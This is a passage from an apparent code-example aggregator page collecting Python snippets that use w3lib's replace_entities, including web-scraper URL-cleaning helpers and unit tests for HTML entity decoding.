    text = html.remove_comments(text)
    return _ajax_crawlable_re.search(text) is not None
import urllib
import urlparse
from urlparse import urljoin
from w3lib.html import replace_entities


def clean_link(link_text):

    return link_text.strip("\t\r\n '\"")

# 返回第一个url地址
list_first_item = lambda x:x[0] if x else None 

# 将url地址组装返回,并移除空格标点 entites
clean_url = lambda base_url, u, response_encoding: urljoin(base_url, replace_entities(clean_link(u.decode(response_encoding))))


# 获取请求参数
def get_query(url, key):
    bits = list(urlparse.urlparse(url))
    query = urlparse.parse_qs(bits[4])

    return query[key][0]


# 设置请求参数
def set_query(url, **args):
    bits = list(urlparse.urlparse(url))
    query = urlparse.parse_qs(bits[4])
Example #43
0
def _cleanup(value):
    return " ".join(replace_entities(replace_tags(value)).strip().split())
Example #44
0
def remove_entities(text, encoding):
    return replace_entities(text, keep=_ENTITIES_TO_KEEP, encoding=encoding)
    """
    if type(arg) is types.ListType:
        return list(set(arg))
    elif type(arg) is types.TupleType:
        return tuple(set(arg))

    return arg


def clean_link(link_text):
    """
        Remove leading and trailing whitespace and punctuation
    """
    return link_text.strip("\t\r\n '\"")


clean_url = lambda base_url, u, response_encoding: urljoin(
    base_url, replace_entities(text=clean_link(u), encoding=response_encoding)
)
#
# clean_url = lambda base_url, u, response_encoding: urljoin(base_url,
#                                                            replace_entities(
#                                                                text=clean_link(u.decode(response_encoding, 'ignore')),
#                                                                encoding=response_encoding)
# )

"""
    remove leading and trailing whitespace and punctuation and entities from the given text.
    then join the base_url and the link that extract
"""
Example #46
0
#!/usr/bin/python
# -*- coding: utf-8 -*-

# __author__ 'Hao LI'

import types

from w3lib.html import replace_entities
from urlparse import urlparse, urljoin

NULL = [None, 'null']

prefix = "www.bbc"

new_prefix = "http://www.bbc.com"

def clean_link(link_text):
    """
        Remove leading and trailing whitespace and punctuation
    """

    return link_text.strip("\t\r\n '\"")

clean_url = lambda base_url,u,response_encoding: urljoin(base_url,
                                                         replace_entities(clean_link(u.decode(response_encoding))))
"""
    remove leading and trailing whitespace and punctuation and entities from the given text.
    then join the base_url and the link that extract
"""
Example #47
0
 def test_returns_unicode(self):
     # make sure it always return uncode
     assert isinstance(replace_entities(b'no entities'), six.text_type)
     assert isinstance(replace_entities(b'Price: &pound;100!'),  six.text_type)
     assert isinstance(replace_entities(u'no entities'), six.text_type)
     assert isinstance(replace_entities(u'Price: &pound;100!'),  six.text_type)
Example #48
0
 def test_encoding(self):
     self.assertEqual(replace_entities(b'x\x99&#153;&#8482;y', encoding='cp1252'), \
                      u'x\u2122\u2122\u2122y')
Example #49
0
 def test_browser_hack(self):
     # check browser hack for numeric character references in the 80-9F range
     self.assertEqual(replace_entities('x&#153;y', encoding='cp1252'), u'x\u2122y')
     self.assertEqual(replace_entities('x&#x99;y', encoding='cp1252'), u'x\u2122y')
Example #50
0
 def test_keep_entities(self):
     # keep some entities
     self.assertEqual(replace_entities(b'<b>Low &lt; High &amp; Medium &pound; six</b>', keep=['lt', 'amp']),
                      u'<b>Low &lt; High &amp; Medium \xa3 six</b>')
     self.assertEqual(replace_entities(u'<b>Low &lt; High &amp; Medium &pound; six</b>', keep=[u'lt', u'amp']),
                      u'<b>Low &lt; High &amp; Medium \xa3 six</b>')